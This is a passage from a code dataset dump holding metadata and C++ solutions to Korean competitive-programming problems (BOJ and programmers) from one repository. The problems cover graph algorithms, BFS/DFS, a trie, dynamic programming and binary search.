n){\n s.insert(gems[end]);\n m[gems[end]]++;\n end++;\n }\n }\n \n answer.push_back(ans_start);\n answer.push_back(ans_end);\n \n return answer;\n}\n\nint main(){\n vector<string> gems = {\"DIA\",\"EM\",\"EM\",\"RUB\",\"DIA\"};\n vector<int> answer;\n\n answer = solution(gems);\n\n for(int i = 0 ; i < answer.size() ; i++)\n cout << answer[i] << \" \";\n}" }, { "alpha_fraction": 0.409431129693985, "alphanum_fraction": 0.42514970898628235, "avg_line_length": 20.22222137451172, "blob_id": "8b44c90ae6e6e2799c52ea45eb896cb6744c9dd8", "content_id": "135a46bd87ce37b42faa64016a4804502de54869", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1404, "license_type": "no_license", "max_line_length": 73, "num_lines": 63, "path": "/programmers/Level 2/bracket_transformation.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nprogrammers Level 2: 괄호 변환\ndate: 2022-04-29\n*/\n#include <string>\n#include <stack>\nusing namespace std;\n\nint isBalanced(string str){ // 균형잡힌 괄호 문자열\n int left = 0, right = 0, ret = -1;\n \n for(int i = 0 ; i < str.length() ; i++){\n if(str[i] == '(') left++;\n else right++;\n \n if(left == right) return i;\n }\n}\n\nbool isCorrect(string str){ // 올바른 괄호 문자열\n stack<char> s;\n \n for(int i = 0 ; i < str.length() ; i++) {\n if(s.empty() || str[i] == '(') s.push(str[i]);\n else if(s.top() == '(') s.pop();\n }\n\n if(!s.empty()) return false;\n else return true;\n}\n\nstring solution(string p) {\n string answer = \"\";\n \n if(p == \"\") return answer;\n if(isBalanced(p) != -1 && isCorrect(p)) return p;\n \n while(1){\n int idx = isBalanced(p);\n \n string u = p.substr(0, idx + 1);\n string v = p.substr(idx + 1);\n \n if(isCorrect(u)){\n answer += u;\n p = v;\n continue;\n }\n \n string tmp = \"(\";\n tmp += solution(v) + \")\";\n \n for(int i = 1 ; i < u.length() - 1 ; i++){ // u의 첫 번째와 마지막 문제는 제외\n if(u[i] == '(') tmp += \")\";\n else tmp += \"(\";\n }\n \n answer += tmp;\n break;\n }\n \n return answer;\n}" }, { "alpha_fraction": 0.3757225573062897, "alphanum_fraction": 0.4084778428077698, "avg_line_length": 19.780000686645508, "blob_id": "c2110777b74f105714bdb42a0a1be942b01664b2", "content_id": "eac9909abc770a16b9d282a6b3777387a27be5cc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1072, "license_type": "no_license", "max_line_length": 58, "num_lines": 50, "path": "/BOJ/Graph Theory/1238_1.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 1238번: 파티\nDATE: 2021-07-12\nFloyd Warshall Algorithm\n*/\n#include <iostream>\n#include <algorithm>\n#define MAX 1000\n#define INF 1e9\nusing namespace std;\n\nint arr[MAX][MAX];\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n, m, x, start, end, t, maximum=-1;\n cin >> n >> m >> x;\n\n for(int i = 0 ; i < n ; i++){\n for(int j = 0 ; j < n ; j++){\n if(i != j) arr[i][j] = INF;\n }\n }\n\n for(int i = 0 ; i < m ; i++){\n cin >> start >> end >> t;\n arr[start-1][end-1] = t;\n }\n\n for(int k = 0 ; k < n ; k++){ //거쳐가는 노드\n for(int i = 0 ; i < n ; i++){ //출발 노드\n for(int j = 0 ; j < n ; j++){ //도착 노드\n if(arr[i][k] + arr[k][j] < arr[i][j]){\n arr[i][j] = arr[i][k] + arr[k][j];\n }\n } \n }\n }\n \n int ans[n];\n\n for(int i = 0 ; i < n ; i++){\n ans[i] = arr[i][x-1] + arr[x-1][i];\n maximum = max(ans[i], maximum);\n }\n\n cout << maximum;\n\n return 0;\n}" }, { "alpha_fraction": 0.28817734122276306, "alphanum_fraction": 0.31921181082725525, "avg_line_length": 22.34482765197754, "blob_id": "a602f2502de27193c5c8cde077a9b76acb0bafcb", "content_id": "b23d6d557c7ec250a748de656594f20285aae687", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2060, "license_type": "no_license", "max_line_length": 63, "num_lines": 87, "path": "/BOJ/Implementation/14499.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UHC", "text": "/*\nBOJ 14499번: 주사위 굴리기\nDATE: 2021-07-02\n*/\n#include <iostream>\nusing namespace std;\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int dice[6] = {0,};\n int n, m, x, y, k, move, bottom=4, right = 1, front=3, tmp;\n cin >> n >> m >> x >> y >> k;\n\n int map[n][m];\n\n for(int i = 0 ; i < n ; i++){\n for(int j = 0 ; j < m ; j++){\n cin >> map[i][j];\n }\n }\n\n for(int i = 0 ; i < k ; i++){\n cin >> move;\n\n if(move == 1){ //동쪽\n y += 1;\n if(x < 0 || x >= n || y < 0 || y >= m){\n y--;\n continue;\n }\n \n tmp = bottom;\n bottom = right;\n if(tmp % 2 == 0) right = tmp +1;\n else right = tmp - 1;\n }\n else if(move == 2){ //서쪽\n y -= 1;\n if(x < 0 || x >= n || y < 0 || y >= m){\n y++;\n continue;\n }\n\n tmp = bottom;\n if(right % 2 == 0) bottom = right+1;\n else bottom = right-1;\n right = tmp;\n }\n else if(move == 3){ //북쪽\n x -= 1;\n if(x < 0 || x >= n || y < 0 || y >= m){\n x++;\n continue;\n }\n\n tmp = bottom;\n if(front % 2 == 0) bottom = front+1;\n else bottom = front - 1;\n front = tmp;\n }\n else if(move == 4){ //남쪽\n x += 1;\n if(x < 0 || x >= n || y < 0 || y >= m){\n x--;\n continue;\n }\n\n tmp = bottom;\n bottom = front;\n if(tmp % 2 == 0) front = tmp + 1;\n else front = tmp - 1;\n }\n\n if(map[x][y] == 0){\n map[x][y] = dice[bottom];\n }\n else{\n dice[bottom] = map[x][y];\n map[x][y] = 0;\n }\n \n if(bottom % 2 == 0) cout << dice[bottom+1] << '\\n';\n else cout << dice[bottom-1] << '\\n';\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.3365384638309479, "alphanum_fraction": 0.372863233089447, "avg_line_length": 18.93617057800293, "blob_id": "b67149b6edefec2397d192faca8e015f289cfdd2", "content_id": "7197c254335751f11d1540d9fc9e1f3394bbc0da", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 942, "license_type": "no_license", "max_line_length": 68, "num_lines": 47, "path": "/BOJ/Graph Theory/10159.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 10159번: 저울\nDATE: 2022-03-06\nFloyd-Warshall Algorithm\n*/\n#include <iostream>\n#define MAX 101\n#define INF 1e9\nusing namespace std;\n\nint arr[MAX][MAX];\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n, m;\n int a, b, cnt = 0;\n cin >> n >> m;\n\n for(int i = 1 ; i <= n ; i++){\n for(int j = 1 ; j <= n ; j++){\n if(i != j) arr[i][j] = INF; \n }\n }\n\n for(int i = 0 ; i < m ; i++){\n cin >> a >> b;\n arr[a][b] = 1;\n }\n\n for(int k = 1 ; k <= n ; k++){\n for(int i = 1 ; i <= n ; i++){\n for(int j = 1 ; j <= n ; j++){\n if(arr[i][k] + arr[k][j] < arr[i][j]) arr[i][j] = 1;\n }\n }\n }\n\n for(int i = 1 ; i <= n ; i++){\n for(int j = 1 ; j <= n ; j++){\n if(arr[i][j] == INF && arr[j][i] == INF) cnt++;\n }\n cout << cnt << '\\n';\n cnt = 0;\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.5013774037361145, "alphanum_fraction": 0.5247933864593506, "avg_line_length": 18.904109954833984, "blob_id": "35dfb5c45f26acef53923aa1da33cc2dbbc00e24", "content_id": "c65c762d40eb6d8e440796a1e83b0c98c476dc75", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1462, "license_type": "no_license", "max_line_length": 63, "num_lines": 73, "path": "/BOJ/MST/1939.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 1939번: 중량제한\n2022-01-03\nKruskal Algorithm\n*/\n#include <iostream>\n#include <vector>\n#include <algorithm>\n#include <queue>\n#define MAX 10001\n#define INF 1000000000\nusing namespace std;\n\nvector<pair<int, pair<int,int>>> edge;\nint parent[MAX];\n\nint getParent(int x) {\n if(parent[x] == x) return x;\n return parent[x] = getParent(parent[x]);\n}\n\nvoid unionParent(int a, int b) {\n a = getParent(a);\n b = getParent(b);\n\n if(a < b) parent[b] = a;\n else parent[a] = b;\n}\n\nint findParent(int a, int b){\n a = getParent(a);\n b = getParent(b);\n\n if(a == b) return true;\n else return false;\n}\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n vector<int> weight;\n int n, m;\n int a, b, c;\n int start, end;\n cin >> n >> m;\n\n for(int i = 1 ; i <= n ; i++) parent[i] = i;\n\n for(int i = 0 ; i < m ; i++) {\n cin >> a >> b >> c;\n edge.push_back({c, {a, b}}); \n edge.push_back({c, {b, a}});\n }\n\n cin >> start >> end;\n sort(edge.begin(), edge.end(), greater<>());\n\n for(int i = 0 ; i < edge.size() ; i++) {\n int a = edge[i].second.first;\n int b = edge[i].second.second;\n int c = edge[i].first;\n\n if(findParent(a, b)) continue;\n unionParent(a, b);\n weight.push_back(c);\n\n if(findParent(start, end)) {\n cout << *min_element(weight.begin(), weight.end());\n break;\n }\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.45552146434783936, "alphanum_fraction": 0.5168711543083191, "avg_line_length": 12.893616676330566, "blob_id": "adf63edbab17c58b4f33ceeedb1d3c16c5c9541d", "content_id": "2bab898e8c357b923e91f72c2ffc16f4d7433e02", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 662, "license_type": "no_license", "max_line_length": 55, "num_lines": 47, "path": "/BOJ/BFS_DFS/2606.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UHC", "text": "/*\nBOJ 2606번: 바이러스\nDATE: 2021-01-18\nBFS\n*/\n#include <iostream>\n#include <queue>\nusing namespace std;\nint arr[101][101]; \nint visit[101];\nint ans=0, n, m;\n\nvoid bfs(int num) {\n\tqueue <int> q;\n\tvisit[num] = 1;\n\n\tq.push(num);\n\twhile (!q.empty()) {\n\t\tint front = q.front();\n\t\tq.pop();\n\n\t\tfor (int i = 1 ; i <= n; i++) {\n\t\t\tif (arr[front][i] && !visit[i]) {\n\t\t\t\tq.push(i);\n\t\t\t\tvisit[i] = 1;\n\t\t\t\tans++;\n\t\t\t}\n\t\t}\n\t}\n}\n\nint main() {\n\tios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n\tcin >> n >> m;\n\n\tfor (int i = 0; i < m; i++) {\n\t\tint num1, num2;\n\t\tcin >> num1 >> num2;\n\t\tarr[num1][num2] = arr[num2][num1] = 1;\n\t}\n\n\tbfs(1);\n\n\tcout << ans;\n\n\treturn 0;\n}" }, { "alpha_fraction": 0.45670628547668457, "alphanum_fraction": 0.4821731746196747, "avg_line_length": 18.032258987426758, "blob_id": "b8d31e22da1ae0592ef953ff85a902d3f290c119", "content_id": "d3f3f5de3c77ac897eaf2ade2b3985996674e880", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 623, "license_type": "no_license", "max_line_length": 88, "num_lines": 31, "path": "/programmers/Level 2/more_spicy.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nprogrammers Level 2: 더 맵게\ndate: 2022-02-23\n-\n새로운 초기화 방법을 알게 되었다..! (line 12)\n*/\n#include <vector>\n#include <queue>\nusing namespace std;\n\nint solution(vector<int> scoville, int K) {\n priority_queue<int, vector<int>, greater<int>> pq(scoville.begin(), scoville.end());\n int answer = 0;\n \n while(pq.top() < K){\n if(pq.size() == 1){\n answer = -1;\n break;\n }\n \n int a = pq.top(); \n pq.pop();\n int b = pq.top();\n pq.pop();\n \n pq.push(a + b * 2);\n answer++;\n }\n \n return answer;\n}" }, { "alpha_fraction": 0.42402827739715576, "alphanum_fraction": 0.4478798508644104, "avg_line_length": 21.215686798095703, "blob_id": "410448911df956b6a5b3550e0d903c27434d3c9a", "content_id": "952f66f167b94378e6ab75cc1ce8c588e74b1152", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1142, "license_type": "no_license", "max_line_length": 53, "num_lines": 51, "path": "/programmers/Level 3/the_farthest_node.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nprogrammers Level 3: 가장 먼 노드\n2022-02-22\nBFS\n*/\n#include <vector>\n#include <algorithm>\n#include <queue>\nusing namespace std;\n\nint solution(int n, vector<vector<int>> edge) {\n vector<int> graph[n + 1];\n vector<bool> visited(n + 1, false);\n vector<int> d(n + 1, 0);\n queue<int> q;\n int answer = 0;\n \n for(int i = 0 ; i < edge.size() ; i++) {\n graph[edge[i][0]].push_back(edge[i][1]);\n graph[edge[i][1]].push_back(edge[i][0]);\n }\n \n q.push(1);\n d[1] = 0;\n visited[1] = true;\n \n while(!q.empty()){\n int cur = q.front();\n q.pop();\n \n for(int i = 0 ; i < graph[cur].size() ; i++){\n if(!visited[graph[cur][i]]) {\n int nextNode = graph[cur][i];\n int nextDistance = d[cur] + 1;\n \n d[nextNode] = nextDistance;\n visited[nextNode] = true;\n q.push(nextNode);\n }\n }\n }\n \n sort(d.begin(), d.end(), greater<>());\n \n for(int i = 0 ; i <= n ; i++){\n if(d[i] != d[0]) break;\n answer++;\n }\n \n return answer;\n}" }, { "alpha_fraction": 0.41582491993904114, "alphanum_fraction": 0.4680134654045105, "avg_line_length": 16, "blob_id": "63606d6b919a36ed921e4b868bee1970534cb96a", "content_id": "6c524fa98e7e5fe456f59d5be07810ab3cbdb34d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 608, "license_type": "no_license", "max_line_length": 59, "num_lines": 35, "path": "/BOJ/Implementation/15565.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 15565번: 귀여운 라이언\nDATE: 2022-02-01\n*/\n#include <iostream>\n#include <vector>\n#include <algorithm>\nusing namespace std;\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0); \n vector<int> vec;\n int n, k, num;\n int ans = 1000001;\n\n cin >> n >> k;\n\n for(int i = 0 ; i < n ; i++) {\n cin >> num;\n if(num == 1) vec.push_back(i);\n }\n\n if(vec.size() < k) {\n cout << -1;\n return 0;\n }\n\n for(int i = 0 ; i <= vec.size() - k ; i++) {\n ans = min(ans, vec[i + k - 1] - vec[i] + 1);\n }\n\n cout << ans;\n\n return 0;\n}" }, { "alpha_fraction": 0.41701245307922363, "alphanum_fraction": 0.4730290472507477, "avg_line_length": 15.655172348022461, "blob_id": "f0e199f3633498df26ba48e4a22a9dbe1d1bd1e1", "content_id": "5460d131de2e0cf350ea5b7409048c5f15089c5f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 494, "license_type": "no_license", "max_line_length": 58, "num_lines": 29, "path": "/BOJ/Dynamic Programming/9461.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 9461번: 파도반 수열\nDATE: 2021-05-28\nDynamic programming\n*/\n#include <iostream>\n#define MAX 101\nusing namespace std;\nlong long dp[MAX];\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int tc;\n cin >> tc;\n\n dp[1] = dp[2] = dp[3] = 1;\n\n for(int i = 4 ; i < MAX ; i++){\n dp[i] = dp[i - 2] + dp[i - 3];\n }\n\n for(int i = 0 ; i < tc ; i++){\n int num;\n cin >> num;\n cout << dp[num] << '\\n';\n }\n \n return 0;\n}" }, { "alpha_fraction": 0.42935678362846375, "alphanum_fraction": 0.44310060143470764, "avg_line_length": 22.636363983154297, "blob_id": "be1b981790c5224ffc9a152c08994a9a24676b68", "content_id": "a0b77c5aa3559f638f40052a83678aa024380d46", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1819, "license_type": "no_license", "max_line_length": 77, "num_lines": 77, "path": "/programmers/Level 3/bad_user.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "//programmers Level 3 : Bad user\n//2019 KAKAO Winter Internship\n//2021-05-08\n#include <string>\n#include <vector>\n#include <set>\n#include <iostream>\n#include <algorithm>\nusing namespace std;\nvector<vector<int>> v;\nset<set<int>> s;\n\nvoid dfs(int depth, vector<int> list){\n if(depth == v.size()){\n set<int> tmp;\n for(int i = 0 ; i < list.size() ; i++){\n tmp.insert(list[i]);\n }\n s.insert(tmp);\n return ;\n }\n\n for(int i = 0 ; i < v[depth].size() ; i++){\n auto it = find(list.begin(), list.end(), v[depth][i]);\n if(it != list.end()){\n continue;\n }\n list.push_back(v[depth][i]);\n dfs(depth + 1, list);\n list.pop_back();\n }\n}\n\nint solution(vector<string> user_id, vector<string> banned_id) {\n int answer = 0;\n vector<int> tmp;\n bool flag;\n \n for(int i = 0 ; i < banned_id.size() ; i++){\n for(int j = 0 ; j < user_id.size() ; j++){\n if(user_id[j].length() != banned_id[i].length())\n continue;\n\n flag = true;\n \n for(int k = 0 ; k < banned_id[i].length() ; k++){\n if(banned_id[i][k] != '*'){\n if(banned_id[i][k] != user_id[j][k]){\n flag = false;\n break;\n }\n }\n }\n \n if(flag){\n tmp.push_back(j);\n }\n }\n v.push_back(tmp);\n tmp.clear();\n }\n\n dfs(0, tmp);\n answer = s.size();\n\n return answer;\n}\n\nint main(){\n vector<string> user_id = {\"frodo\", \"fradi\", \"crodo\", \"abc123\", \"frodoc\"};\n vector<string> banned_id = {\"fr*d*\", \"*rodo\", \"******\", \"******\"};\n\n int ans = solution(user_id, banned_id);\n cout << ans;\n\n return 0;\n}" }, { "alpha_fraction": 0.39732685685157776, "alphanum_fraction": 0.449574738740921, "avg_line_length": 17.727272033691406, "blob_id": "bc035ecb810f36d1b4961af2a2b9133fd2bccbf6", "content_id": "9e6ad5e9ea90b8c5aa93ba4dd56cc167662e58e8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 833, "license_type": "no_license", "max_line_length": 58, "num_lines": 44, "path": "/BOJ/Binary Search/3079.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 3079번: 입국심사\nDATE: 2021-03-21\nBinary Search\n*/\n#include <iostream>\n#include <algorithm>\nusing namespace std;\n#define MAX 1000000000000000000\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n long long n, m, total, start, end, mid;\n long long min = MAX;\n cin >> n >> m;\n\n int time[n];\n for (int i = 0; i < n; i++) {\n cin >> time[i];\n }\n\n sort(time, time + n);\n end = m * time[n - 1];\n\n while (end - start >= 0) {\n mid = (start + end) / 2;\n total = 0;\n for (int i = 0; i < n; i++) {\n total += mid / time[i];\n }\n\n if (total >= m) {\n end = mid - 1;\n if (mid < min) min = mid;\n }\n else if (total < m) {\n start = mid + 1;\n }\n }\n\n cout << min;\n\n return 0;\n}" }, { "alpha_fraction": 0.4460028111934662, "alphanum_fraction": 0.47124823927879333, "avg_line_length": 17.063291549682617, "blob_id": "4eebfcc40dd3ea7ce791a168476288821034b7bb", "content_id": "305b2dd7d0294e69848afb8bc91ab651a1c0391e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1562, "license_type": "no_license", "max_line_length": 58, "num_lines": 79, "path": "/BOJ/Graph Theory/5052.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 5052번: 전화번호 목록\nDATE: 2021-03-29\n*/\n#include <iostream>\n#include <string>\n#include <cstring>\n#include <vector>\n#include <algorithm>\nusing namespace std;\n\nstruct Trie {\n\tTrie* next[10];\n\tbool finish;\n\tbool nextChild;\n\n\tTrie() {\n\t\tfill(next, next + 10, nullptr);\n\t\tfinish = nextChild = false;\n\t}\n\n\tvoid insert(char* key) {\n\t\tif (*key == '\\0') { //입력 끝\n\t\t\tfinish = true;\n\t\t}\n\t\telse {\n\t\t\tint now = *key - '0';\n\n\t\t\tif (next[now] == NULL) //연결된 노드 없을 때\n\t\t\t\tnext[now] = new Trie(); \n\t\t\tnextChild = true;\n\n\t\t\tnext[now]->insert(key + 1); //다음 문자열로 넘어감\n\t\t}\n\t}\n\n\tbool find(char* key) {\n\t\tif (*key == '\\0') //노드가 생성되지 않은 경우\n\t\t\treturn false;\n\t\tif (finish) //존재하는 문자열일 경우\n\t\t\treturn true;\n\t\tint now = *key - '0';\n\t\treturn next[now]->find(key + 1); //다음 문자열로 넘어감\n\t}\n};\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int t, n;\n cin >> t;\n\n for(int i = 0 ; i < t ; i++){\n bool check = false;\n char num[10001][11];\n\n cin >> n;\n Trie* trie = new Trie();\n\n for(int i = 0 ; i < n ; i++){\n cin >> num[i];\n trie->insert(num[i]);\n }\n \n for(int i = 0 ; i < n ; i++){\n if(trie->find(num[i])){ //해당 번호가 접두어로 존재\n check = true;\n break;\n }\n }\n \n if(check) \n cout << \"NO\\n\";\n else\n cout << \"YES\\n\";\n\n delete trie;\n }\n return 0;\n}" }, { "alpha_fraction": 0.44581618905067444, "alphanum_fraction": 0.49108368158340454, "avg_line_length": 16.380952835083008, "blob_id": "ff15bbc8b33dd0e7ce3da98c39239c2dd3ae31e6", "content_id": "822908729222c9415362eeeab97b7472f98aa0ee", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 785, "license_type": "no_license", "max_line_length": 81, "num_lines": 42, "path": "/BOJ/BFS_DFS/16953.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 16953번: A → B\nDATE: 2022-03-13\n-\nx * 2 연산과 y * 10 + 1 연산 중 중복이 발생할 수 없으므로 방문 체크 안 해줘도 됨\n*/\n#include <iostream>\n#include <queue>\n#define ll long long\nusing namespace std;\n\nll a, b;\nint cnt;\n\nvoid bfs(ll a){\n queue<pair<ll,ll>> q;\n q.push({a, 1});\n\n while(!q.empty()){\n pair<ll,ll> cur = q.front();\n q.pop();\n\n if(cur.first == b) {\n cout << cur.second;\n return;\n }\n\n if(cur.first * 2 <= b) q.push({cur.first * 2, cur.second + 1});\n if(cur.first * 10 + 1 <= b) q.push({cur.first * 10 + 1, cur.second + 1});\n }\n\n cout << -1;\n}\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n cin >> a >> b;\n\n bfs(a);\n\n return 0;\n}" }, { "alpha_fraction": 0.4637801945209503, "alphanum_fraction": 0.487926721572876, "avg_line_length": 20.464284896850586, "blob_id": "b4ab02b281fcdd8a6dc79dfbf571df974b6b6d6a", "content_id": "1baf0cd6209d654a0e90d9ce0c3cd7f78bf80340", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1267, "license_type": "no_license", "max_line_length": 73, "num_lines": 56, "path": "/BOJ/Binary Search/2568.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 2568번: 전깃줄 - 2\nDATE: 2022-02-24\n*/\n#include <iostream>\n#include <vector>\n#include <algorithm>\nusing namespace std;\n\nvector<int> inputA, inputB, lis, index;\n\nvoid backtrace(int i, int num){\n if(i == -1) return;\n if(index[i] == num){\n inputA[i] = -1; // 가장 긴 증가하는 부분 수열에 해당하는 인덱스는 -1로 처리\n backtrace(i - 1, num - 1);\n }\n else backtrace(i - 1, num);\n}\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n vector<pair<int,int>> p;\n int n, a, b;\n cin >> n;\n\n for(int i = 0 ; i < n ; i++){\n cin >> a >> b;\n p.push_back({a, b});\n }\n\n sort(p.begin(), p.end());\n \n for(int i = 0 ; i < n ; i++){\n inputA.push_back(p[i].first); // A 전봇대\n inputB.push_back(p[i].second); // B 전봇대\n\n int num = p[i].second;\n int idx = lower_bound(lis.begin(), lis.end(), num) - lis.begin();\n\n if(lis.empty() || num > lis.back()) lis.push_back(num);\n else lis[idx] = num;\n\n index.push_back(idx);\n }\n \n cout << n - lis.size() << '\\n';\n\n backtrace(n - 1, lis.size() - 1); \n\n for(int i = 0 ; i < n ; i++){\n if(inputA[i] != -1) cout << inputA[i] << '\\n';\n }\n\n return 0;\n}" }, { "alpha_fraction": 0.440559446811676, "alphanum_fraction": 0.5104895234107971, "avg_line_length": 20.22222137451172, "blob_id": "65ca8a69f6ce46f908676a5326d77365c4856e36", "content_id": "1aa68791ca0a62db75222c89dbd943efcdfa0f3f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 578, "license_type": "no_license", "max_line_length": 60, "num_lines": 27, "path": "/BOJ/Dynamic Programming/1149.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 1149번: RGB거리\nDATE: 2021-07-27\nDynamic Programming\n*/\n#include <iostream>\n#include <algorithm>\nusing namespace std;\n\nint house[1000][3];\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n, r, g, b;\n cin >> n;\n\n for(int i = 0 ; i < n ; i++){\n cin >> r >> g >> b;\n house[i][0] = min(house[i-1][1], house[i-1][2]) + r;\n house[i][1] = min(house[i-1][0], house[i-1][2]) + g;\n house[i][2] = min(house[i-1][0], house[i-1][1]) + b;\n }\n\n cout << *min_element(house[n-1], house[n-1] + 3);\n\n return 0;\n}" }, { "alpha_fraction": 0.38828203082084656, "alphanum_fraction": 0.4280039668083191, "avg_line_length": 18.764705657958984, "blob_id": "27f808e6858fe8ef891393bf2ca6487502ba6b6f", "content_id": "c5c2982ab287839364627b81326a40791bb28112", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1117, "license_type": "no_license", "max_line_length": 93, "num_lines": 51, "path": "/BOJ/BFS_DFS/13549_1.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 13549번: 숨바꼭질 3\n2022-01-12\nBFS ver.\n*/\n#include <iostream>\n#include <queue>\n#define MAX 100001\nusing namespace std;\n\nint mv[3] = {2, -1, 1};\nint sec[MAX] = {0, };\nqueue<int> q;\n\nint main(){\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int n, k;\n cin >> n >> k;\n\n sec[n] = 1; // 0초로 두고 시작하면 이미 방문했어도 방문하지 않은 것으로 판단된다. 따라서 초깃값을 1로 설정하고 답을 출력할 때 -1 해주는 것.\n q.push(n);\n\n while(!q.empty()){\n int cur = q.front();\n int next;\n q.pop();\n\n if(cur == k){\n cout << sec[cur] - 1;\n break;\n }\n\n for(int i = 0 ; i < 3 ; i++){\n bool flag = true;\n\n if(i > 0) { \n next = cur + mv[i];\n flag = false;\n }\n else next = cur * mv[i];\n\n if(next < 0 || next > MAX - 1 || sec[next]) continue;\n \n q.push(next);\n if(!flag) sec[next] = sec[cur] + 1;\n else sec[next] = sec[cur];\n } \n }\n\n return 0;\n}" }, { "alpha_fraction": 0.47770699858665466, "alphanum_fraction": 0.5133758187294006, "avg_line_length": 16.086956024169922, "blob_id": "b6136135881989d79f3525e9750306033c57a1ee", "content_id": "d314c92319021f5f957f26bb667450177eced66b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 801, "license_type": "no_license", "max_line_length": 59, "num_lines": 46, "path": "/BOJ/Mathematics/1990.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 1990번: 소수인팰린드롬\n2021-12-26\n*/\n#include <iostream>\n#include <algorithm>\n#include <math.h>\nusing namespace std;\n\nbool isPrime(int num) {\n if(num < 2) return false;\n\n for(int i = 2 ; i <= sqrt(num) ; i++) {\n if(num % i == 0) return false;\n }\n\n return true;\n}\n\nbool isPalindrome(string str) {\n string front, back;\n \n front = str;\n reverse(str.begin(), str.end());\n back = str;\n\n if(front == back) return true;\n else return false;\n}\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0); \n int a, b;\n cin >> a >> b;\n\n for(int i = a ; i <= 10000000 ; i++) {\n if(i > b) break;\n if(isPalindrome(to_string(i)) && isPrime(i)) {\n cout << i << '\\n';\n }\n }\n\n cout << -1;\n\n return 0;\n}" }, { "alpha_fraction": 0.38199180364608765, "alphanum_fraction": 0.425648033618927, "avg_line_length": 16.4761905670166, "blob_id": "02f888ae83c3943ccc4f27eac21e47990006735b", "content_id": "07b16f786047a93d889d56eaebe4527bb8d599b8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 743, "license_type": "no_license", "max_line_length": 58, "num_lines": 42, "path": "/BOJ/BFS_DFS/2644.cpp", "repo_name": "yegyeom/Algorithm", "src_encoding": "UTF-8", "text": "/*\nBOJ 2644번: 촌수계산\nDATE: 2021-10-18\nDFS\n*/\n#include <iostream>\nusing namespace std;\n\nint n, a, b, answer = -1;\nint arr[100][100];\nbool visited[100] = {false,};\n\nvoid dfs(int node, int length) {\n visited[node] = true;\n\n for(int i = 1 ; i <= n ; i++) {\n if(arr[node][i] == 1 && !visited[i]) {\n if(i == b) {\n answer = length;\n return;\n }\n dfs(i, length + 1);\n }\n }\n}\n\nint main() {\n ios_base::sync_with_stdio(0); cin.tie(0); cout.tie(0);\n int m;\n cin >> n >> a >> b >> m;\n\n for(int i = 0 ; i < 